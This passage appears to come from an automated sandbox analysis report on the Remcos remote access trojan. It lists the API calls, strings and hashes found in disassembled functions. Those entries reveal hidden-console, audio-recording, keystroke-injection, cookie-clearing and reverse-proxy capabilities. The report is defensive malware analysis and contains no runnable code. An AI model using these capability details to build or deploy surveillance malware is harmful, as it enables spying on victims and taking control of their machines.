                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                  • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tcp$udp
                                                  • API String ID: 0-3725065008
                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                  • API String ID: 3578746661-168337528
                                                  • Opcode ID: 912a490c9f57dbfcc587fa7d1c5c21fc62ed6523c64bcd28f6914e9761c814c4
                                                  • Instruction ID: cd9a01f22de2d9f6a9994d78948339ea64d6c0f71f497d0a384e35af32d82467
                                                  • Opcode Fuzzy Hash: 912a490c9f57dbfcc587fa7d1c5c21fc62ed6523c64bcd28f6914e9761c814c4
                                                  • Instruction Fuzzy Hash: 0E51C531A042015BC724FB36D95AAAE36A5AB80344F40453FF606576F2EF7C8985C7DE
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EF0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474F08,00404C49,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404BA5
                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID: .part
                                                  • API String ID: 1303771098-3499674018
                                                  • Opcode ID: 1c74304f0d8a39b96394dbac3491f71fab0eadfa66f8f74413216f3170821217
                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                  • Opcode Fuzzy Hash: 1c74304f0d8a39b96394dbac3491f71fab0eadfa66f8f74413216f3170821217
                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                  APIs
                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,0Q), ref: 00413678
                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                  • String ID: .exe$0Q$HSG$http\shell\open\command$program files (x86)\$program files\
                                                  • API String ID: 3286818993-343596525
                                                  • Opcode ID: fa326314ce386abd98558d248a0a5855eea9ad68a7a78f33b0bcd501982763e9
                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                  • Opcode Fuzzy Hash: fa326314ce386abd98558d248a0a5855eea9ad68a7a78f33b0bcd501982763e9
                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                  APIs
                                                  • _strftime.LIBCMT ref: 00401BD4
                                                    • Part of subcall function 00401CE9: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401C86
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CC4
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CD3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: %Y-%m-%d %H.%M$.wav$tMG
                                                  • API String ID: 3809562944-3627046146
                                                  • Opcode ID: 860d3e74fe0a78210b7a0e50221a70bc7efe1b3b044880423b2291f847fe891e
                                                  • Instruction ID: 77224d9c3c18060e3821781750c24aeed92f5db76bec914a8a88ddbccf287b9a
                                                  • Opcode Fuzzy Hash: 860d3e74fe0a78210b7a0e50221a70bc7efe1b3b044880423b2291f847fe891e
                                                  • Instruction Fuzzy Hash: 5F3181315043019FC325EB62DD46A9A77A8FB84319F40443EF149A31F2EFB89949CB9A
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401A7D
                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AC8,Function_00001B8F,00000000,00000000,00000024), ref: 00401B13
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401B67
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401B76
                                                  • waveInStart.WINMM ref: 00401B82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: 0Q$tMG
                                                  • API String ID: 1356121797-907356086
                                                  • Opcode ID: a32bf82f151408e5f3abe306aa4422ab47744250154bd8f7e0bff8bea5466356
                                                  • Instruction ID: cbef553d477d36f78321a165484ecc4410fcecc505b8f9aca62d01b994c6c3e6
                                                  • Opcode Fuzzy Hash: a32bf82f151408e5f3abe306aa4422ab47744250154bd8f7e0bff8bea5466356
                                                  • Instruction Fuzzy Hash: 8E2148716042019FC7299F6AEE09A697BAAFB84711B04403EE10DD76F1DBF848C5CB2C
                                                  APIs
                                                  • AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                                  • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$Window$AllocOutputShow
                                                  • String ID: Remcos v$5.2.0 Pro$CONOUT$
                                                  • API String ID: 4067487056-793934204
                                                  • Opcode ID: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                  • Instruction ID: a031bdd2f27af694b11ce09d1e3c688e218bb3586dee27dfc95755d0e541b829
                                                  • Opcode Fuzzy Hash: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                  • Instruction Fuzzy Hash: 2D014471A80304BBD610F7F19D8BF9EB7AC9B18B05F500527BA04A70D2EB6DD944466E
                                                  APIs
                                                  • SendInput.USER32 ref: 00419A25
                                                  • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InputSend$Virtual
                                                  • String ID:
                                                  • API String ID: 1167301434-0
                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16_free
                                                  • String ID: a/p$am/pm$h{D
                                                  • API String ID: 2936374016-2303565833
                                                  • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                  • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                  APIs
                                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                  • _free.LIBCMT ref: 00444E87
                                                  • _free.LIBCMT ref: 00444E9E
                                                  • _free.LIBCMT ref: 00444EBD
                                                  • _free.LIBCMT ref: 00444ED8
                                                  • _free.LIBCMT ref: 00444EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocHeap
                                                  • String ID: KED
                                                  • API String ID: 1835388192-2133951994
                                                  • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                  • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                  • __fassign.LIBCMT ref: 0044B514
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EF0,00000000), ref: 00401A04
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                  • String ID: }P$`kG$kG
                                                  • API String ID: 1649129571-3090597795
                                                  • Opcode ID: d26ad7fd0f7a550b7167d8afa0917e9376220741f9dc3002f5e53dbcbdf844a8
                                                  • Instruction ID: dc699b77c08b599092ddf19de7d80486fcd8c0a7edd7622242773fc29a9484b7
                                                  • Opcode Fuzzy Hash: d26ad7fd0f7a550b7167d8afa0917e9376220741f9dc3002f5e53dbcbdf844a8
                                                  • Instruction Fuzzy Hash: 3441C2312042009BC324FB36DD96ABE73A6AB85354F00453FF54AA61F1DF38AD4AC61E
                                                  APIs
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                  • API String ID: 1133728706-4073444585
                                                  • Opcode ID: 169012899dcc524a18e64d23a62114e2c04a38a47b5835457938c033b22ee2b7
                                                  • Instruction ID: 7718d61ab729039ae94473664947c91a52367f601ff6055b29c84dcba8ed2574
                                                  • Opcode Fuzzy Hash: 169012899dcc524a18e64d23a62114e2c04a38a47b5835457938c033b22ee2b7
                                                  • Instruction Fuzzy Hash: E7215230A40219A6CB14F7F1CC969EE7729AF50744F80017FE502B71D1EB7D6945C6DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                  • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                  APIs
                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                  • _free.LIBCMT ref: 00450FC8
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450FD3
                                                  • _free.LIBCMT ref: 00450FDE
                                                  • _free.LIBCMT ref: 00451032
                                                  • _free.LIBCMT ref: 0045103D
                                                  • _free.LIBCMT ref: 00451048
                                                  • _free.LIBCMT ref: 00451053
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                  • int.LIBCPMT ref: 004111BE
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
